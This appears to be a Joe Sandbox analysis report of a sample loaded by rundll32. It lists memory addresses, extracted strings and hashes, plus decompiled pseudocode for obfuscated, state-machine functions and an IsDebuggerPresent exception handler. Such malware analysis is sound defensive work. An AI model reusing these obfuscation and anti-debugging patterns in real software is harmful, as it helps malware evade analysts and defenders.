0x00343eed
0x00343efb
0x00343f00
0x00343f06
0x00343f0e
0x00343f16
0x00343f1e
0x00343f23
0x00343f2b
0x00343f37
0x00343f3c
0x00343f42
0x00343f4a
0x00343f52
0x00343f57
0x00343f5f
0x00343f67
0x00343f6f
0x00343f7c
0x00343f7d
0x00343f81
0x00343f89
0x00343f91
0x00343f9e
0x00343fa2
0x00343faa
0x00343fb2
0x00343fc0
0x00343fc4
0x00343fcc
0x00343fd4
0x00343fd9
0x00343fe1
0x00343fe9
0x00343ff1
0x00343ff9
0x00344001
0x00344009
0x00344011
0x00344019
0x00344023
0x00344030
0x00344038
0x00344040
0x00344045
0x0034404a
0x00344052
0x0034405a
0x00344062
0x00344067
0x0034406f
0x00344077
0x0034407f
0x0034408d
0x00344092
0x00344098
0x003440a0
0x003440a8
0x003440b0
0x003440b8
0x003440c5
0x003440c6
0x003440cc
0x003440d0
0x003440d8
0x003440dd
0x003440e5
0x003440ed
0x003440fb
0x003440fc
0x00344100
0x00344105
0x0034410d
0x0034410d
0x0034410d
0x00344112
0x00344112
0x0034411c
0x003441bb
0x003441c1
0x003441c9
0x003441c9
0x003441cc
0x00000000
0x00000000
0x003441c6
0x003441c6
0x003441c6
0x003441ce
0x003441d1
0x00000000
0x00344122
0x00344128
0x00344146
0x0034414f
0x00344157
0x0034415d
0x003441a0
0x003441ae
0x003441b1
0x003441b6
0x00344208
0x0034420a
0x0034420f
0x00000000
0x0034412a
0x00344130
0x0034422e
0x00344136
0x0034413c
0x00000000
0x00344142
0x00344142
0x00000000
0x00344142
0x0034413c
0x00344130
0x00344128
0x00344235
0x00344240
0x00344240
0x003441f0
0x003441f7
0x003441fa
0x003441fc
0x00344201
0x00344201
0x00344204
0x00000000
0x00344210
0x00344210
0x00344210
0x00000000
0x0034421c

Strings

.6, xrefs: 003441A2
y@x, xrefs: 00343FB2
.6, xrefs: 0034410D
L, xrefs: 00344077
?R, xrefs: 00343FF9
.6, xrefs: 0034420A

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .6$.6$.6$y@x$?R$L
API String ID: 0-3177096336
Opcode ID: 563f114ef1af71d9c632447612f601dcebccde98425b72536e0365f53e3b4553
Instruction ID: 4ff3533432ce23447f66a92698c374064d6f27074f37428dbdbe93658916153d
Opcode Fuzzy Hash: 563f114ef1af71d9c632447612f601dcebccde98425b72536e0365f53e3b4553
Instruction Fuzzy Hash: BEA140B25083409FD398CF25C88A51BBBE1FBD4758F108A1DF1958A260D3B19949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0034B74D Relevance: 7.7, Strings: 6, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0034B74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E0034CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E0035C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E00347B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E00347C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E00359E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E003446BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00344C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}

0x0034b74d
0x0034b750
0x0034b755
0x0034b75d
0x0034b765
0x0034b76d
0x0034b775
0x0034b77d
0x0034b785
0x0034b78d
0x0034b792
0x0034b79a
0x0034b79f
0x0034b7a7
0x0034b7b7
0x0034b7b9
0x0034b7bf
0x0034b7c4
0x0034b7c9
0x0034b7cf
0x0034b7d7
0x0034b7e3
0x0034b7e8
0x0034b7ee
0x0034b7f6
0x0034b7fe
0x0034b803
0x0034b808
0x0034b810
0x0034b81c
0x0034b81f
0x0034b823
0x0034b82b
0x0034b833
0x0034b840
0x0034b844
0x0034b84c
0x0034b854
0x0034b85c
0x0034b864
0x0034b86c
0x0034b874
0x0034b87e
0x0034b882
0x0034b88a
0x0034b892
0x0034b89a
0x0034b8a2
0x0034b8a6
0x0034b8ae
0x0034b8b6
0x0034b8be
0x0034b8c6
0x0034b8ce
0x0034b8d6
0x0034b8de
0x0034b8e6
0x0034b8ee
0x0034b8f6
0x0034b8fe
0x0034b908
0x0034b90c
0x0034b914
0x0034b91c
0x0034b923
0x0034b930
0x0034b938
0x0034b940
0x0034b945
0x0034b94d
0x0034b955
0x0034b95a
0x0034b962
0x0034b96a
0x0034b979
0x0034b97c
0x0034b980
0x0034b985
0x0034b98d
0x0034b995
0x0034b99a
0x0034b9a2
0x0034b9aa
0x0034b9b2
0x0034b9ba
0x0034b9c2
0x0034b9c7
0x0034b9cf
0x0034b9d7
0x0034b9df
0x0034b9e7
0x0034b9ef
0x0034b9f7
0x0034b9ff
0x0034ba07
0x0034ba0f
0x0034ba14
0x0034ba1c
0x0034ba24
0x0034ba2c
0x0034ba3c
0x0034ba44
0x0034ba47
0x0034ba4b
0x0034ba53
0x0034ba53
0x0034ba53
0x0034ba58
0x00000000
0x0034ba58
0x0034ba6a
0x0034bb2d
0x0034bb31
0x0034bb36
0x0034bb39
0x0034bb3c
0x0034bb40
0x0034bb45
0x00000000
0x0034bb45
0x0034ba76
0x0034bac0
0x0034bad3
0x0034bad8
0x0034badb
0x0034bade
0x0034bae0
0x0034baf8
0x0034bafd
0x0034bb00
0x0034bb04
0x0034bb0c
0x0034bb10
0x0034bb15
0x0034bb18
0x00000000
0x0034bb18
0x0034ba78
0x0034ba7a
0x00000000
0x0034bb75
0x0034ba82
0x00000000
0x0034ba88
0x0034baa9
0x0034baae
0x0034bab1
0x0034bab6
0x0034babc
0x0034ba53
0x0034ba53
0x0034ba53
0x00000000
0x0034ba53
0x0034ba53
0x0034bab6
0x0034ba82
0x0034bb7d
0x0034bb7d
0x0034bb4d
0x0034bb52
0x0034bb52
0x0034bb52
0x00000000
0x0034ba58

Strings

e', xrefs: 0034B8AE
>e`, xrefs: 0034B88A
?p, xrefs: 0034B823
!), xrefs: 0034B792
2+l, xrefs: 0034B755
J, xrefs: 0034B9E7

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !)$2+l$>e`$?p$J$e'
API String ID: 0-1675410552
Opcode ID: 3042184fd0ad961dc6366d7a4a291c03b7b95430d4171208e8b933fda82a716e
Instruction ID: 826fc73ca3eda7b15eaf8f7594a9291fbd8328f70e566e8d43e8f2861c221cb0
Opcode Fuzzy Hash: 3042184fd0ad961dc6366d7a4a291c03b7b95430d4171208e8b933fda82a716e
Instruction Fuzzy Hash: FDB11F724083409FC359CF65C58A40BFBE2FBD5758F108A1CF58A9A260D3B5DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 100357B5
SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
TerminateProcess.KERNEL32(00000000), ref: 100357F8

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56

Uniqueness

Uniqueness Score: -1.00%

Function 00360056 Relevance: 6.7, Strings: 5, Instructions: 443
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00360056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E00341FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E0035DCF7(_v1684, 0x341080, __eflags);
									_pop(_t546);
									__eflags = E0034AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E0034A8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E0034F002(2 + E0034CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0034CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E003546BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x363e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E0035DCF7(_v1624, 0x341020, _t618);
													E0035176B( &_v1040, _t618);
													_t556 =  *0x363e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E00351652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E0034A8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

0x00360056
0x0036005c
0x00360066
0x0036006d
0x00360075
0x0036007d
0x00360088
0x00360093
0x0036009e
0x003600a6
0x003600ab
0x003600b3
0x003600bb
0x003600c3
0x003600cf
0x003600d6
0x003600e4
0x003600e9
0x003600fa
0x003600fd
0x00360104
0x0036010f
0x0036011a
0x00360122
0x0036012d
0x0036013a
0x00360143
0x00360147
0x0036014b
0x00360153
0x0036015e
0x00360169
0x00360174
0x00360184
0x00360188
0x0036018d
0x00360195
0x003601a7
0x003601ac
0x003601b5
0x003601c0
0x003601d2
0x003601d7
0x003601e0
0x003601eb
0x003601fd
0x00360202
0x0036020b
0x00360216
0x00360228
0x0036022b
0x00360237
0x0036023c
0x00360245
0x00360250
0x0036025d
0x00360260
0x00360264
0x0036026c
0x00360274
0x0036027c
0x00360284
0x0036028c
0x00360294
0x0036029c
0x003602a4
0x003602ac
0x003602b0
0x003602b5
0x003602ba
0x003602c2
0x003602ce
0x003602d3
0x003602d9
0x003602e1
0x003602e9
0x003602f1
0x003602f9
0x00360305
0x00360308
0x0036030c
0x00360314
0x0036031c
0x00360324
0x0036032c
0x00360331
0x00360339
0x00360341
0x0036034c
0x00360357
0x00360362
0x0036036d
0x00360378
0x00360383
0x00360390
0x00360399
0x0036039d
0x003603a5
0x003603ad
0x003603b7
0x003603bb
0x003603c3
0x003603cb
0x003603d3
0x003603d8
0x003603dd
0x003603e5
0x003603ed
0x003603f2
0x003603f7
0x003603ff
0x0036040a
0x00360415
0x00360422
0x0036042a
0x0036042f
0x00360434
0x0036043c
0x00360444
0x0036044c
0x00360454
0x0036045c
0x00360464
0x0036046c
0x00360471
0x00360479
0x00360481
0x00360489
0x00360491
0x00360499
0x003604a1
0x003604b5
0x003604ba
0x003604c1
0x003604cc
0x003604d7
0x003604e2
0x003604ed
0x003604f8
0x00360503
0x0036050b
0x00360516
0x00360521
0x00360530
0x00360533
0x00360537
0x0036053b
0x00360543
0x0036054b
0x0036055e
0x00360565
0x00360570
0x00360580
0x00360584
0x0036058c
0x00360594
0x003605a1
0x003605ad
0x003605b6
0x003605b7
0x003605bb
0x003605c3
0x003605cb
0x003605d0
0x003605d5
0x003605dd
0x003605e5
0x003605ed
0x003605f8
0x003605fc
0x00360604
0x0036060f
0x0036061a
0x00360625
0x0036062d
0x00360642
0x00360647
